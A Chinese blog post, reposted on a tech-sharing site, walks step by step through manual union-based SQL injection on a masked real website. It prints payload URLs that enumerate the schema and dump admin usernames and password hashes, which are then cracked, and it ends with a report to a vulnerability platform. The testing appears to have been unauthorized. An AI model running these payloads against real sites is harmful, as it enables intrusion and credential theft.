标签：www 21 pid detail 纯手工 注入 com cn

开门见山

---

 

扫到一个站存在SQL注入，放到阿D、明小子上猜解失败，欲放弃，突然打算试一下手工注入。

1. 验证是否可注入

http://www.xxx.com.cn/product-detail.php?pid=21’ 

 

 

 

 

 再用 and 1=1和 and 1=2验证

确定有注入

 

2. 猜字段

http://www.xxx.com.cn/product-detail.php?pid=21 order by 37  正常页面

http://www.xxx.com.cn/product-detail.php?pid=21 order by 38 报错页面

字段数为37

 

3. 暴出字段位置

http://www.xxx.com.cn/product-detail.php?pid=21 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

 

 

 

4. 暴库和管理员信息

http://www.xxx.com.cn/product-detail.php?pid=21 UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

 

 

得到库名和管理员信息 

 

5. 列当前库的表名

库名的十六进制编码   0x736565xxxxxx6E67

 

 

 

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables where table_schema=0x736565xxxxxx6E67

 

表名太多用审核元素列开查看

猜想 admin 或者 admin_login 可能是存放管理员账号与密码的表

 

6. 在第17个字段暴出admin_login表的字段

admin_login  十六进制编码     0x61646D696Exxxxxxxx696E

 

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,group_concat(column_name),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.columns where table_name=0x61646D696Exxxxxxxx696E

 

字段   id,username,ip,ctime,id,ip,ctime,username

 

7. 再在第17个字段暴出admin表的字段

admin  十六进制编码    0x61646xxx6E

 

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,group_concat(column_name),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.columns where table_name=0x61646xxx6E

 

审核元素列开查看

admin表的字段：id,username,password,ctime,logintime,loginsum,id,username,password,permission,ctime,logintime,loginsum

 

8. 暴出字段内容

0x3a 的十六进制是 ： 用来分隔字段内容

 

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,2,3,4,5,6,7,8,user(),10,11,database(),13,14,15,group_concat(username,0x3a,password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from admin

 

得到字段内容，也就是管理员登录账号

使用MD5解密

 

9. 提交补天漏洞平台

 

 

 不到一周，得到厂商回复和肯定。

 

 

 

 

---

 

标签：www,21,pid,detail,纯手工,注入,com,cn
来源： https://www.cnblogs.com/joker-vip/p/12266881.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。